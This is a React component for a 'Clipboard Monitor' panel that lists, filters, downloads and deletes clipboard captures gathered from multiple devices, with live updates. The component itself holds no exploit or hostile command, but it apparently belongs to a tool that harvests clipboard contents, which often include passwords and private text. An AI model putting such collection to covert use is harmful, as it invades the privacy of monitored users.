import React, { useState, useEffect, useCallback } from 'react';
import { useLiveEvents } from '../hooks/useLiveEvents';
import { api } from '../store/auth';

function ClipCard({ entry: e }) {
  const [expanded, setExpanded] = useState(false);
  const [copied, setCopied] = useState(false);
  const isTruncated = (e.text || '').length > 400 || (e.text || '').split('\n').length > 8;

  const copy = useCallback(() => {
    navigator.clipboard.writeText(e.text || '').then(() => {
      setCopied(true);
      setTimeout(() => setCopied(false), 1500);
    });
  }, [e.text]);

  return (
    <div style={card}>
      <div style={{ display: 'flex', justifyContent: 'space-between',
                    alignItems: 'center', marginBottom: 6, fontSize: 12, color: 'var(--muted)' }}>
        <span>Device: {e.device_id?.slice(0, 8)}</span>
        <div style={{ display: 'flex', gap: 6, alignItems: 'center' }}>
          <span>{e.ts ? new Date(e.ts).toLocaleString() : ''}</span>
          {isTruncated && (
            <button onClick={() => setExpanded(x => !x)} style={microBtn}>
              {expanded ? 'Collapse' : 'Show all'}
            </button>
          )}
          <button onClick={copy} style={{ ...microBtn, color: copied ? '#22c55e' : 'var(--muted)' }}>
            {copied ? 'Copied!' : 'Copy'}
          </button>
        </div>
      </div>
      <pre style={{ whiteSpace: 'pre-wrap', wordBreak: 'break-all',
                    color: 'var(--text)', margin: 0, fontSize: 13,
                    maxHeight: expanded ? 'none' : 200, overflow: expanded ? 'visible' : 'hidden' }}>
        {e.text}
      </pre>
      {isTruncated && !expanded && (
        <div style={{ color: 'var(--muted)', fontSize: 11, marginTop: 4, cursor: 'pointer' }}
          onClick={() => setExpanded(true)}>▼ click to show full text</div>
      )}
    </div>
  );
}

export default function Clipboard() {
  const [entries, setEntries] = useState([]);
  const [filter, setFilter] = useState('');

  useEffect(() => {
    api.get('/devices/clipboard/all?limit=500')
      .then(r => setEntries(r.data.map(e => ({
        id: e.id,
        device_id: e.device_id,
        text: e.text,
        ts: e.captured_at,
      }))))
      .catch(() => {});
  }, []);

  useLiveEvents((event) => {
    if (event.event === 'clipboard' && event.text) {
      setEntries(prev => [{ id: Date.now(), device_id: event.device_id, text: event.text, ts: event.ts }, ...prev].slice(0, 500));
    }
  });

  const deleteAll = async () => {
    if (!window.confirm('Delete ALL clipboard entries from all devices?')) return;
    try {
      await api.delete('/devices/clipboard/all');
      setEntries([]);
    } catch {
      alert('Delete failed');
    }
  };

  const downloadAll = () => {
    const lines = entries.map(e =>
      `[${e.ts}] Device: ${e.device_id?.slice(0,8)}\n${e.text || ''}`
    ).join('\n\n---\n\n');
    const blob = new Blob([lines], { type: 'text/plain' });
    const url = URL.createObjectURL(blob);
    const a = document.createElement('a');
    a.href = url;
    a.download = `clipboard_all_${new Date().toISOString().slice(0,10)}.txt`;
    a.click();
    URL.revokeObjectURL(url);
  };

  const filtered = filter
    ? entries.filter(e =>
        e.text?.toLowerCase().includes(filter.toLowerCase()) ||
        e.device_id?.includes(filter)
      )
    : entries;

  return (
    <div>
      <div style={{ display: 'flex', alignItems: 'center', gap: 12, marginBottom: 20 }}>
        <h2>Clipboard Monitor</h2>
        <input
          value={filter}
          onChange={e => setFilter(e.target.value)}
          placeholder="Filter…"
          style={inputStyle}
        />
        <button onClick={downloadAll} style={clearBtn}>↓ Download</button>
        <button onClick={deleteAll} style={{ ...clearBtn, color:'#ef4444', borderColor:'#ef444444' }}>Delete All</button>
        <button onClick={() => setEntries([])} style={clearBtn}>Clear View</button>
        <span style={{ color: 'var(--muted)', fontSize: 12 }}>{entries.length} captures</span>
      </div>

      <div style={{ display: 'flex', flexDirection: 'column', gap: 8 }}>
        {filtered.map((e, i) => (
          <ClipCard key={i} entry={e} />
        ))}
        {entries.length === 0 && (
          <div style={{ padding: 60, textAlign: 'center', color: 'var(--muted)' }}>
            Waiting for clipboard captures…
          </div>
        )}
      </div>
    </div>
  );
}

const card = {
  background: 'var(--surface)', border: '1px solid var(--border)',
  borderRadius: 8, padding: 14,
};
const microBtn = {
  padding: '2px 8px', background: 'transparent', border: '1px solid var(--border)',
  borderRadius: 4, fontSize: 10, cursor: 'pointer', color: 'var(--muted)',
};
const inputStyle = {
  padding: '6px 12px', background: 'var(--surface)',
  border: '1px solid var(--border)', borderRadius: 6,
  color: 'var(--text)', width: 200,
};
const clearBtn = {
  padding: '6px 14px', background: 'var(--surface)',
  border: '1px solid var(--border)', borderRadius: 6,
  color: 'var(--muted)', cursor: 'pointer',
};
